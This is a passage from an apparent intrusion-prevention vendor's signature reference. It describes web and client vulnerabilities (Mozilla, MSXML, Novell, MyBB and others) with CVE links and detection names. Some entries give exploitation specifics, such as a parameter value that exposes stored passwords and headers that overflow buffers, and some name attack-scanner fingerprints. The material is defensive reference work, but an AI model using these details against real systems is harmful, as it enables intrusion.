CVE-2008-4031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4031
BID-32594
http://www.securityfocus.com/bid/32594
MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072
Back to top

HTTP-Microsoft-Word-Section-Table-Array-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Microsoft Word. The vulnerability can be exploited by delivering a malicious Word document with a malformed PLCFSED record inside the Table Stream to the target user who opens it with the affected application. This leads to a denial of service condition terminating the vulnerable appalication or arbitrary code execution with the privileges of the currently logged in user.
Situation: E-Mail_BS-Microsoft-Word-Section-Table-Array-Buffer-Overflow
HTTP_Microsoft-Word-Section-Table-Array-Buffer-Overflow
File-OLE_Microsoft-Word-Section-Table-Array-Buffer-Overflow
References:
CVE-2007-0515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0515
BID-22225
http://www.securityfocus.com/bid/22225
OSVDB-31900
http://www.osvdb.org/31900
MS07-014
http://technet.microsoft.com/security/bulletin/MS07-014
Back to top

HTTP-Microsoft-Xml-Core-Services-ActiveX-Control-Code-Exectution

About this vulnerability: A vulnerability in Microsoft XML Core Services allows code execution
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1772-5242
Platform: Generic
Software: Microsoft XML Core Services
Type: Malfunction
Description: There is a vulnerability in the Microsoft XML Core Services (XMLHTTP) ActiveX component. A malicious HTML page can be used to execute code in the context of the local user.
Situation: HTTP_SS-Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution
File-Text_Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution-With-Open
File-Text_Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution
References:
CVE-2006-5745
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5745
BID-20915
http://www.securityfocus.com/bid/20915
MS06-071
http://technet.microsoft.com/security/bulletin/MS06-071
Back to top

HTTP-Microsoft-Xml-Core-Services-Memory-Corruption-Vulnerability

About this vulnerability: A vulnerability in Microsoft XML Core Services
Risk: Moderate
First detected in: sgpkg-ips-117-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Microsoft XML Core Services. The vulnerability is caused due to lack of parameter check in the substringData method of various MSXML ActiveX controls. A remote attack can exploit these vulnerability by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption
File-Text_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption
References:
CVE-2007-2223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2223
BID-25301
http://www.securityfocus.com/bid/25301
MS07-042
http://technet.microsoft.com/security/bulletin/MS07-042
Back to top

HTTP-MiniWeb-Negative-Contentlength-DoS

About this vulnerability: Negative Content-Length causes Denial of Service
Risk: Low
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MiniWeb
Type: Buffer Overflow
Description: MiniWeb HTTP server crashes if a POST request contains a negative Content-Length value
Situation: HTTP_CSH-Negative-Content-Length-Value
References:
CVE-2007-3159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3159
BID-24375
http://www.securityfocus.com/bid/24375
OSVDB-37185
http://www.osvdb.org/37185
Back to top

HTTP-Miva-Htmlscript-Directory-Traversal

About this vulnerability: Server readable files can be disclosed due to directory traversal vulnerability.
Risk: Low
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Miva htmlscript
Type: Directory Traversal
Description: The interpreter is vulnerable to directory traversal attacks using relative paths. Any file the server process can access can be read by this method.
Situation: HTTP_CSU-Miva-Htmlscript-Directory-Traversal
References:
CVE-1999-0264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0264
BID-2001
http://www.securityfocus.com/bid/2001
Back to top

HTTP-Morfeus-Scanner

About this vulnerability: Morfeus Scanner Attack Tool
Risk: Moderate
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Morfeus
Type: Browser
Description: Morfeus Scanner is an attack tool that is designed to exploit website-related vulnerabilities. Morfeus identiefies itself as "User-Agent: Morfeus Fucking Scanner".
Situation: HTTP_CSH-Morfeus-Scanner-Usage
Back to top

HTTP-Mozilla-Command-Line-Url-Command-Execution

About this vulnerability: Mozilla start-up script command execution vulnerability
Risk: High
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-1296-5242
Platform: Linux; HP-UX
Software: Mozilla based browsers
Type: Malfunction
Description: Mozilla based web browsers suffer from a shell command execution vulnerability. The browsers are usually launched in UNIX environments from command line with a script, and the URL to be opened can be passed as a parameter. The start-up script does not validate the input sufficiently, failing in remote back-tick characters from the URL. Third party software, especially mail clients, use the command line script to launch a browser when URLs are selected. This allows remote attackers to execute arbitrary commands by tricking the victim to view an URL, for example, by sending an email containing a specially-crafted URL.
Situation: E-Mail_BS-Mozilla-Command-Line-Url-Command-Execution
File-Text_Mozilla-Command-Line-Url-Command-Execution
References:
CVE-2005-2968
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2968
BID-14888
http://www.securityfocus.com/bid/14888
Back to top

HTTP-Mozilla-CSS-Moz-Binding-Cross-Site-Scripting

About this vulnerability: Mozilla browsers -moz-binding CSS property XSS vulnerability
Risk: Low
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Suite
Type: Cross-site Scripting
Description: Mozilla based browsers suffer from a cross site scripting (XSS) vulnerability in the handling of a CSS property. The browsers are able to handle Extensible Binding Language (XBL), which can be used to describe bindings that can be attached to elements in other documents. Bindings can be attached to elements by using the CSS -moz-binding property. Due to a flaw in the browser, domain based restrictions are not imposed on resources referenced through the Bindings mechanism. The vulnerability allows attackers to access information specific to different domains, for example to steal cookies from specific sites.
Situation: HTTP_Mozilla-CSS-Moz-Binding-Cross-Site-Scripting
File-Text_Mozilla-CSS-Moz-Binding-Cross-Site-Scripting
References:
CVE-2006-0496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0496
BID-16427
http://www.securityfocus.com/bid/16427
OSVDB-22924
http://www.osvdb.org/22924
Back to top

HTTP-Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow

About this vulnerability: Mozilla Firefox CSS letter-spacing heap overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Suite; Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Buffer Overflow
Description: Mozilla Suite, Firefox, SeaMonkey and Thunderbird have a heap based buffer overflow vulnerability. The vulnerability can be exploited by persuading a user to view a specially crafted HTML page with a vulnerable product, causing a DoS or allowing non-privileged code execution.
Situation: HTTP_Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow
File-Text_Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow
References:
CVE-2006-1730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1730
BID-17516
http://www.securityfocus.com/bid/17516
Back to top

HTTP-Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution

About this vulnerability: Code execution vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mozilla Firefox
Type: Malfunction
Description: There is a code execution vulnerability in Mozilla Firefox. Opening a crafted web page with malicious arguments passed to the vulnerable "FirefoxURL://" handler with Internet Explorer may lead to arbitrary JavaScript code execution with Chrome privileges.
Situation: HTTP_SS-Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution
File-Text_Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution
References:
CVE-2007-3670
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3670
BID-24837
http://www.securityfocus.com/bid/24837
OSVDB-38017
http://www.osvdb.org/38017
Back to top

HTTP-Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution

About this vulnerability: Privilege escalation vulnerability with JavaScript execution in Mozilla Firefox
Risk: Moderate
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Suite
Type: Malfunction
Description: Mozilla Firefox has a vulnerability in the handling of security restrictions when jar or view-source schemes are used in HTML. If javascript URL is supplied inside these schemes it is possible that the script bypasses the normal security restrictions.
Situation: HTTP_Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution
File-Text_Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution
References:
CVE-2005-1531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1531
BID-13641
http://www.securityfocus.com/bid/13641
Back to top

HTTP-Mozilla-IDN-Encoded-Hostname-BOF

About this vulnerability: Mozilla-based browsers IDN encoded hostname buffer overflow
Risk: High
First detected in: sgpkg-ips-38-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla based browsers
Type: Buffer Overflow
Description: Mozilla-based browsers do not handle IDN encoded hostnames properly. A specially-crafted hostname can be used to overflow a buffer, allowing arbitrary code execution.
Situation: HTTP_Mozilla-IDN-Encoded-Hostname-BOF
File-Text_Mozilla-IDN-Encoded-Hostname-BOF
References:
CVE-2005-2871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2871
BID-14784
http://www.securityfocus.com/bid/14784
OSVDB-19255
http://www.osvdb.org/19255
Back to top

HTTP-Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft XML Core Services allows code execution
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey
Type: Malfunction
Description: There is a vulnerability in the Mozilla Firefox and SeaMonkey browsers. A malicious HTML page can be used to execute code within the context of the current user.
Situation: HTTP_SS-Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption
File-Text_Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption
References:
CVE-2006-6504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6504
BID-21668
http://www.securityfocus.com/bid/21668
Back to top

HTTP-Mozilla-Products-Malformed-Gif-Buffer-Overflow

About this vulnerability: Heap-based buffer overflow vulnerability in the way Mozilla products parse Netscape extension 2 blocks in GIF image files
Risk: Moderate
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Suite; Mozilla Thunderbird
Type: Buffer Overflow
Description: There is a heap-based buffer overflow vulnerability in the way Mozilla products parse Netscape extension 2 blocks in GIF images. When the vulnerable product is used to render a malicious GIF image, the application may crash or freeze, creating a denial of service condition, or arbitrary code may be executed with the privileges of the currently logged in user.
Situation: HTTP_SS-Mozilla-Products-Malformed-Gif-Buffer-Overflow
File-GIF_Mozilla-Products-Malformed-Gif-Buffer-Overflow
References:
CVE-2005-0399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0399
BID-12881
http://www.securityfocus.com/bid/12881
Back to top

HTTP-Mozilla-Products-Regular-Expressions-Heap-Corruption

About this vulnerability: Heap-based buffer overflow vulnerability in Mozilla based browsers
Risk: Moderate
First detected in: sgpkg-ips-81-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla based browsers
Type: Buffer Overflow
Description: There is a heap-based buffer overflow vulnerability in Mozilla based browsers. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary non-privileged code execution on the victim's computer.
Situation: HTTP_Mozilla-Products-Regular-Expressions-Heap-Corruption
File-Text_Mozilla-Products-Regular-Expressions-Heap-Corruption
References:
CVE-2006-4566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4566
BID-20042
http://www.securityfocus.com/bid/20042
OSVDB-28844
http://www.osvdb.org/28844
Back to top

HTTP-Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Mozilla Foundation's family of browser products
Risk: High
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1729-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Malfunction
Description: There is a memory corruption vulnerability in Mozilla Foundation's family of browser products. The vulnerability can be exploited remotely to execute arbitrary code in the context of the currently logged-in user.
Situation: HTTP_SS-Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption
File-TextId_Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption
References:
CVE-2007-2867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2867
BID-24242
http://www.securityfocus.com/bid/24242
OSVDB-35134
http://www.osvdb.org/35134
Back to top

HTTP-Mozilla-Suite-DOM-Property-Code-Execution-Vulnerability

About this vulnerability: Mozilla Suite DOM property code execution vulnerability
Risk: Moderate
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Suite; Mozilla Firefox
Type: Malfunction
Description: Mozilla Suite and Firefox have a vulnerability concerning the JavaScript eval method. The vulnerability can be exploited by persuading a user to view a specially crafted HTML page allowing arbitrary code execution with the privileges of the user running the vulnerable browser.
Situation: HTTP_Mozilla-Suite-DOM-Property-Code-Execution
File-Text_Mozilla-Suite-DOM-Property-Code-Execution
References:
CVE-2005-1532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1532
BID-13645
http://www.securityfocus.com/bid/13645
Back to top

HTTP-MPM-Guestbook-Pro-Header-Php-Code-Injection

About this vulnerability: MPM Guestbook Pro allows arbitrary script code execution
Risk: Moderate
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MPM Guestbook Pro
Type: PHP Injection
Description: MPM Guestbook Pro, a php guestbook system, allows remote attackers to execute arbitrary php code and view arbitrary code on the server. The file top.php uses "include($header)", allowing an attacker to specify $header. There also exists a file disclosure vulnerability on the same variable, allowing remote attackers to view arbitrary files on the server by supplying a relative path to $he
Situation: HTTP_CSU-MPM-Guestbook-Pro-Header-Php-Code-Injection
References:
BID-12266
http://www.securityfocus.com/bid/12266
Back to top

HTTP-Muieblackcat-Scanner

About this vulnerability: Muieblackcat Scanner Attack Tool
Risk: Moderate
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Muieblackcat
Type: Browser
Description: Muieblackcat Scanner is an attack tool that is designed to exploit website-related PHP vulnerabilities. Muieblackcat sometimes identifies itself by starting the scan with a request to URI "/muieblackcat" and then starts requesting "setup.php" files.
Situation: HTTP_CSU-Muieblackcat-Scanner-Usage
Back to top

HTTP-Multiple-Content-Encodings

About this vulnerability: Multiple content encodings in a HTTP message
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Input Validation
Description: Content-Encoding header in HTTP is used to indicate additional content codings that have been applied to HTTP message body. Multiple content encoding may be used, but certain combinations of content encodings are not normally used and are interpreted differently by different web browsers.
Situation: HTTP_SHS-Multiple-Gzip-Or-Deflate-Content-Encodings
Back to top

HTTP-MyBB-Domecode-Function-Php-Code-Execution

About this vulnerability: Php code execution vulnerability in the domecode function in MyBB
Risk: High
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MyBB
Type: Code Injection
Description: There is a PHP code execution vulnerability in the domecode function in MyBB due to insufficient input validation of the username value. A successful exploitation of this vulnerability leads to arbitrary PHP code execution with the privileges of the web server.
Situation: HTTP_CSU-MyBB-Domecode-Function-Php-Code-Execution
HTTP_CRL-MyBB-Domecode-Function-Remote-Php-Code-Execution
References:
CVE-2006-2908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2908
BID-18396
http://www.securityfocus.com/bid/18396
OSVDB-26216
http://www.osvdb.org/26216
Back to top

HTTP-MySQL-MaxDB-Webtool-WebDBM-Database-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in MySQL MaxDB Webtool's WebDBM module
Risk: High
First detected in: sgpkg-ips-79-1314
Last changed: sgpkg-ips-1350-5242
Platform: Windows
Software: MaxDB
Type: Buffer Overflow
Description: MaxDB Webtool, a web-based application interface bundled with MaxDB, suffers from a buffer overflow vulnerability due to not checking the input length for the "database" argument. The database name is copied into a buffer 18 bytes long, allowing remote attackers to easily overflow the buffer via an HTTP request specifying a long "database" argument. A successful attack allows arbitrary code execution with the Webtool process's privileges.
Situation: HTTP_CRL-MySQL-MaxDB-Webtool-WebDBM-Database-Buffer-Overflow
References:
CVE-2006-4305
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4305
BID-19660
http://www.securityfocus.com/bid/19660
Back to top

HTTP-Nagios-Content-Length-Handling-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Nagios
Risk: Moderate
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Nagios
Type: Buffer Overflow
Description: Nagios has a buffer overflow vulnerability in the handling of crafted Content-Length HTTP header fields. A remote attacker exploiting this vulnerability succesfully is able to execute arbitrary code on the target system in the context of the running web server.
Situation: HTTP_CSH-Negative-Content-Length-Value
HTTP_CSH-Excessively-Large-Content-Length-Value
References:
CVE-2006-2162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2162
BID-17879
http://www.securityfocus.com/bid/17879
OSVDB-25434
http://www.osvdb.org/25434
Back to top

HTTP-NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in NCTsoft NCTAudioFile2 ActiveX control
Risk: Moderate
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NCTsoft NCTAudioStudio; NCTsoft NCTAudioEditor; NCTsoft NCTDialogicVoice
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the NCTsoft NCTAudioFile2 ActiveX control. The control is included in several products from the vendor. A malicious, crafted web page may be used to execute code in the context of the current user, leading to system compromise or denial of service.
Situation: HTTP_SS-NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow
File-Text_NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0018
BID-23892
http://www.securityfocus.com/bid/23892
BID-22196
http://www.securityfocus.com/bid/22196
Back to top

HTTP-Net.Commerce-orderdspc.d2w-SQL-Injection-Vulnerability

About this vulnerability: SQL injection in IBM Net.Commerce.
Risk: Critical
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: IBM Net.Commerce; IBM WebSphere Commerce Suite
Type: SQL Injection
Description: IBM's Net.Commerce contains vulnerable macros, which won't validate a user's input, allowing attacker to inject SQL into the request to acquire elevated privileges. It is possible use these privileges to execute arbitrary commands in the system.
References:
CVE-2001-0319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0319
BID-2350
http://www.securityfocus.com/bid/2350
Back to top

HTTP-Netscape-Enterprise-Server-Index-Disclosure-Vulnerability

About this vulnerability: Netscape Enterprise Server Index Disclosure Vulnerability
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Netscape Enterprise Server
Type: Malfunction
Description: Netscape Enterprise Server will disclose directory contents to unauthorized users if web publishing is enabled.
Situation: HTTP_CS-Index-Directory-Disclosure-Attempt
References:
CVE-2001-0250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0250
BID-2285
http://www.securityfocus.com/bid/2285
Back to top

HTTP-Netscape-Enterprise-Server-Revlog-DoS

About this vulnerability: Netscape Enterprise Server Revlog DoS
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Netscape Enterprise Server
Type: Malfunction
Description: The Netscape Enterprise Server an be crashed with certain commands if web publishing is enabled.
Situation: HTTP_CS-Netscape-Enterprice-Server-Revlog-DoS
References:
CVE-2001-0251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0251
BID-2294
http://www.securityfocus.com/bid/2294
Back to top

HTTP-Netwin-CWMail-Buffer-Overflow

About this vulnerability: Buffer-overflow vulnerability in Netwin CWMail
Risk: Moderate
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetWin CWMail
Type: Buffer Overflow
Description: Netwin CWMail has a buffer-overflow vulnerability in the way it handles data with the 'item' parameter. A remote attacker is able to use this vulnerability to execute arbitrary code on the server.
Situation: HTTP_CS-Netwin-CWMail-ShellCode-Detect
References:
CVE-2002-0273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0273
BID-4093
http://www.securityfocus.com/bid/4093
Back to top

HTTP-Newsletter-Zws-Ulevel-Information-Disclosure

About this vulnerability: Newsletter Zws allows users to view all logins and passwords
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Zaireweb Solutions Newsletter ZWS
Type: Malfunction
Description: Newsletter ZWS allows remote users to view all login names and passwords by calling the admin.php script's list_user operation with ulevel parameter set to 1 (admin).
References:
CVE-2004-0621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0621
BID-10605
http://www.securityfocus.com/bid/10605
Back to top

HTTP-Novell-Convert-Bas-Dir-Traversal

About this vulnerability: Novell convert.bas Directory Traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Novell NetWare
Software: <os>
Type: Directory Traversal
Description: The Novell convert.bas program can be exploited to read any file on the system by using directory traversal.
References:
CVE-1999-0175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0175
Back to top

HTTP-Novell-eDirectory-HTTP-Headers-Denial-Of-Service

About this vulnerability: A resource exhaustion vulnerability in Novell eDirectory
Risk: Moderate
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: Novell eDirectory
Type: Resource Starvation
Description: There is a resource exhaustion vulnerability in Novell eDirectory. The vulnerability can be triggered by sending a crafted HTTP request that contains more than one Connection header, or a Connection header with more than one value to the vulnerable server, causing a denial of service condition.
Situation: HTTP_CS-Novell-eDirectory-HTTP-Headers-Denial-Of-Service
References:
CVE-2008-0927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0927
BID-28757
http://www.securityfocus.com/bid/28757
OSVDB-44035
http://www.osvdb.org/44035
Back to top

HTTP-Novell-eDirectory-HTTP-Server-Redirection-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the iMonitor HTTP server component of Novell eDirectory products
Risk: High
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-1581-5242
Platform: Generic
Software: Novell eDirectory
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Novell eDirectory. The iMonitor HTTP server component does not properly handle HTTP requests that contain an excessively long Host header field. A successful exploitation of this vulnerability leads to a DoS or arbitrary code execution with the privileges of the service process, which is System by default on Windows machines.
Situation: HTTP_CSH-Overly-Long-Host-Header-Field
HTTP_CSH-Binary-Data-In-Long-Host-Header-Field
POP3_Novell-eDirectory-CVE-2006-5478
HTTP_CSH-Novell-eDirectory-CVE-2006-5478
References:
CVE-2006-5478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5478
BID-20655
http://www.securityfocus.com/bid/20655
Back to top

HTTP-Novell-Groupwise-Messenger-Accept-Language-Header-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Novell GroupWise Messenger
Risk: High
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-1582-5242
Platform: Generic
Software: Novell GroupWise Messenger
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the handling of the Accept-Language header field value in Novell GroupWise Messenger. A successful exploitation of this vulnerability leads to a DoS or arbitrary code execution with the privileges of the System user.
References:
CVE-2006-0992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0992
BID-17503
http://www.securityfocus.com/bid/17503
OSVDB-24617
http://www.osvdb.org/24617
Back to top

HTTP-Novell-Groupwise-Messenger-HTTP-POST-Request-Invalid-Memory-Access

About this vulnerability: Denial of service vulnerability in Novell GroupWise Messenger
Risk: Moderate
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1730-5242
Platform: Generic
Software: Novell GroupWise Messenger
Type: Malfunction
Description: There is a denial of service vulnerability in the handling of crafted HTTP requests in Novell GroupWise Messenger. A successful exploitation leads to a denial of service condition.
References:
CVE-2006-4511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4511
BID-20316
http://www.securityfocus.com/bid/20316
OSVDB-29486
http://www.osvdb.org/29486
Back to top

HTTP-Novell-Groupwise-WebAccess-HTTP-Basic-Authentication-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Novell GroupWise WebAccess
Risk: High
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: Novell GroupWise
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Novell GroupWise WebAccess. An HTTP request that contains an excessively long base64 encoded string in the Authorization header field sent to the vulnerable Novell GroupWise WebAccess service leads to a denial of service or root/system level arbitrary code execution.
Situation: HTTP_CSH-Basic-Authentication-Header-Buffer-Overflow
References:
CVE-2007-2171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2171
BID-23556
http://www.securityfocus.com/bid/23556
Back to top

HTTP-Novell-iManager-Tomcat-POST-Request-Denial-Of-Service

About this vulnerability: Novell iManager Tomcat HTTP POST Request Handling Denial of Service
Risk: Moderate
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Novell iManager
Type: Buffer Overflow
Description: There is a denial of service vulnerability in the Novell iManager Tomcat HTTP server component. The vulnerability is due to a failure to verify user-supplied data in incoming HTTP POST requests. An unauthenticated remote attacker can exploit this vulnerability to terminate the affected service.
Situation: HTTP_CRL-Novell-iManager-Tree-Name-Denial-Of-Service
References:
CVE-2006-4517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4517
BID-20841
http://www.securityfocus.com/bid/20841
Back to top

HTTP-Novell-iManager-Tree-Name-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in Novell iManager
Risk: Moderate
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Novell iManager
Type: Buffer Overflow
Description: There is a denial of service vulnerability in the Novell iManager. An unauthenticated remote attacker can exploit this vulnerability to terminate the affected service.
Situation: HTTP_CRL-Novell-iManager-Tree-Name-Denial-Of-Service
References:
CVE-2010-1930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1930
BID-40485
http://www.securityfocus.com/bid/40485
OSVDB-65738
http://www.osvdb.org/65738
Back to top

HTTP-Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-BOF

About this vulnerability: Buffer overflow vulnerability in Novell iPrint Client for Windows
Risk: High
First detected in: sgpkg-ips-148-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell iPrint Client for Windows
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell iPrint Client for Windows. By persuading a user to view a malicious web page, a remote attacker can execute arbitrary code with the privileges of the currently logged on user.
Situation: HTTP_SS-Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-BOF
File-Text_Novell-iPrint-Client-ActiveX-Control-Vulnerable-Method-Call
References:
CVE-2008-0935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0935
BID-27939
http://www.securityfocus.com/bid/27939
Back to top

HTTP-Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Novell iPrint Client
Risk: Moderate
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell iPrint Client for Windows
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Novell iPrint Client. Successful exploitation allows termination of the Internet Explorer browser or non-privileged arbitrary code execution on a vulnerable host.
Situation: HTTP_SS-Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow
File-Text_Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow
References:
CVE-2008-2908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2908
BID-29736
http://www.securityfocus.com/bid/29736
OSVDB-46194
http://www.osvdb.org/46194
Back to top

HTTP-NPDS-Thold-SQL-Injection

About this vulnerability: SQL injection vulnerability in NPDS thold parameter
Risk: Moderate
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NPDS
Type: SQL Injection
Description: NPDS has an input validation vulnerability in the handling of user supplied data. Remote attackers can execute arbitrary SQL commands via the 'thold' parameter in 'comments.php' or 'pollcomments.php'.
Situation: HTTP_CSU-NPDS-Thold-SQL-Injection
References:
CVE-2005-1637
